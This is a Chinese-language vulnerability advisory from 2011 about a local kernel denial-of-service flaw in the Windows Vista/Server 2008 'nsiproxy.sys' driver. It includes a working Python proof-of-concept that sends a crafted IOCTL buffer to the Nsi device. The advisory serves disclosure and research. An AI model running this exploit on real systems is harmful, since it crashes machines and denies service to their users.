Microsoft Windows "nsiproxy.sys"驱动程序本地拒绝服务漏洞
发布日期:2011-05-18
更新日期:2011-05-18
受影响系统:Microsoft Windows Vista
Microsoft Windows Server 2008
描述:
BUGTRAQ ID:
47897
Microsoft Windows是微软发布的非常流行的操作系统。
Microsoft Windows "nsiproxy.sys"驱动程序在实现上存在本地拒绝服务漏洞,本地攻击者可利用此漏洞造成拒绝服务,使受影响计算机不再响应。
<*来源:Lufeng Li (
lilf@neusoft.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
############################################################################
##
## Title: Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
## Author: Lufeng Li of Neusoft Corporation
## Vendor: www.microsoft.com
## Vulnerable: Windows Vista/Server 2008
##
############################################################################
from ctypes import *
kernel32 = windll.kernel32
Psapi = windll.Psapi
if __name__ == '__main__':
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2
SYM_NAME = "\\\\.\\Nsi"
dwReturn = c_ulong()
out_buff = ''
in_buff = ("\x00\x00\x00\x00\x00\x00\x00\x00\xec\x2d\x39\x6e\x07\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x38\x89\x6c\x01\x08\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x10\xfa\x78\x00\x28\x00\x00\x00"
"\x38\xfa\x78\x00\x0c\x00\x00\x00")
handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None)
dev_ioct = kernel32.DeviceIoControl(handle, 0x12003f, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None)
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/浏览次数:3595
严重程度:0(网友投票)